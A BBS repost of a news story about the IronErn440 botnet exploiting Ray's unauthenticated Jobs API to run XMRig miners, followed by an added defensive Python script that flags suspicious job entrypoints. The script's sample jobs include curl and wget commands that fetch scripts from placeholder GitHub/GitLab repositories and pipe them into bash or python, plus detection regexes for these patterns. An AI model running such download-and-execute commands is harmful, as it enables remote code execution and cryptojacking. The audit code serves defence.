Subj : Ray clusters hijacked and turned into crypto miners by shadowy ne
To   : All
From : TechnologyDaily
Date : Wed Nov 19 2025 15:30:08

Ray clusters hijacked and turned into crypto miners by shadowy new botnet

Date: Wed, 19 Nov 2025 15:21:00 +0000

Description: IronErn440 is using a known, unfixed flaw to create a botnet and deploy the XMRig cryptojacker.

FULL STORY
======================================================================

- Ray clusters remain vulnerable to remote code execution via unauthenticated Jobs API
- Threat group IronErn440 exploits flaw with AI-generated payloads, deploying XMRig cryptojacker
- Over 230,000 Ray servers are exposed online, up from a few thousand in 2023

Ray clusters, still vulnerable to a critical-severity flaw discovered years ago, are being used for cryptocurrency mining, data exfiltration, and even Distributed Denial of Service (DDoS) attacks, experts have warned.

Cybersecurity researchers at Oligo claim this is the second major campaign to leverage this same flaw.

Ray is an open source network that helps run Python programs faster by decentralizing and distributing the work across multiple machines. Its clusters are groups of computers - one head node and multiple worker nodes - that work together to run Ray tasks and workloads in a distributed and coordinated way.

Deploying and hiding XMRig

Back in 2023, it was discovered that Ray 2.6.3 and 2.8.0 carried a vulnerability that allowed a remote attacker to execute arbitrary code via the job submission API. However, Anyscale, the company behind the product, did not fix it, since Ray is designed to run in a strictly-controlled network environment.

In other words, it's up to the users to secure their infrastructure and make sure the flaw does not get abused.

But abused it was: first between September 2023 and March 2024, and again today. Oligo says that threat actors tracked as IronErn440 are now using AI-generated payloads to infiltrate vulnerable clusters.

By leveraging the bug, the attackers submit jobs to the unauthenticated Jobs API, running multi-stage Bash and Python payloads hosted on GitHub and GitLab. These payloads deploy malware to the devices - usually the infamous XMRig cryptojacker.

While this cryptojacker is usually easily spotted (since it takes up 100% of the device's processing power and renders it useless for pretty much anything else), the attackers tried to work around this issue by locking it to 60% of processing power.

Today, there are more than 230,000 Ray servers exposed to the internet, the researchers warned, saying that the number had grown significantly from just a few thousand that were available when the vulnerability was first discovered.

Via BleepingComputer

======================================================================
Link to news story:
https://www.techradar.com/pro/security/ray-clusters-hijacked-and-turned-into-crypto-miners-by-shadowy-new-botnet

--- Mystic BBS v1.12 A49 (Linux/64)
 * Origin: tqwNet Technology News (1337:1/100)
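
Added example, not part of the original story and not code from Oligo, Anyscale or Ray: one way a defender could review jobs already submitted to a cluster for the pattern the story describes, a job whose command downloads a script from GitHub or GitLab and pipes it into Bash or Python. The job records are constructed, and the field names submission_id and entrypoint are assumed to match what your cluster's job listing returns.

```python
import re

# Code hosts the article names as payload hosting.
CODE_HOSTS = r"(?:raw\.githubusercontent\.com|github\.com|gitlab\.com)"
# curl/wget fetching from one of those hosts within the same shell command.
FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&]*https?://" + CODE_HOSTS, re.I)
# Download piped straight into a shell or Python interpreter.
PIPE_TO_INTERPRETER = re.compile(r"\|\s*(?:(?:ba|z|da)?sh|python[0-9.]*)\b", re.I)
# Naive name match; a renamed miner binary will not trip it.
MINER_NAME = re.compile(r"xmrig", re.I)

# Constructed job records (assumed fields: submission_id, entrypoint).
SAMPLE_JOBS = [
    {"submission_id": "constructed-01", "entrypoint": "python train.py --epochs 10"},
    {"submission_id": "constructed-02",
     "entrypoint": "curl -fsSL https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/stage1.sh | bash"},
    {"submission_id": "constructed-03",
     "entrypoint": "wget -qO- https://gitlab.com/EXAMPLE-GROUP/EXAMPLE-PROJECT/-/raw/main/stage2.py | python3 -"},
    {"submission_id": "constructed-04",
     "entrypoint": "curl -o data.csv https://github.com/EXAMPLE-ORG/datasets/raw/main/data.csv && python etl.py"},
    {"submission_id": "constructed-05", "entrypoint": "nohup ./XMRig"},
]

def audit_job(job):
    """Return the reasons a job's entrypoint looks suspicious (empty list if none)."""
    entry = job.get("entrypoint") or ""
    reasons = []
    if FETCH.search(entry):
        reasons.append("fetches from public code host")
        if PIPE_TO_INTERPRETER.search(entry):
            reasons.append("pipes download into interpreter")
    if MINER_NAME.search(entry):
        reasons.append("miner name in command")
    return reasons

def audit_jobs(jobs):
    """Map submission_id -> reasons for every job that trips at least one rule."""
    findings = {}
    for job in jobs:
        reasons = audit_job(job)
        if reasons:
            findings[job.get("submission_id", "<missing id>")] = reasons
    return findings

if __name__ == "__main__":
    for sid, reasons in audit_jobs(SAMPLE_JOBS).items():
        print(f"{sid}: {', '.join(reasons)}")
```

A hit on the first rule alone is a prompt for review rather than a verdict, since legitimate jobs also download data from these hosts.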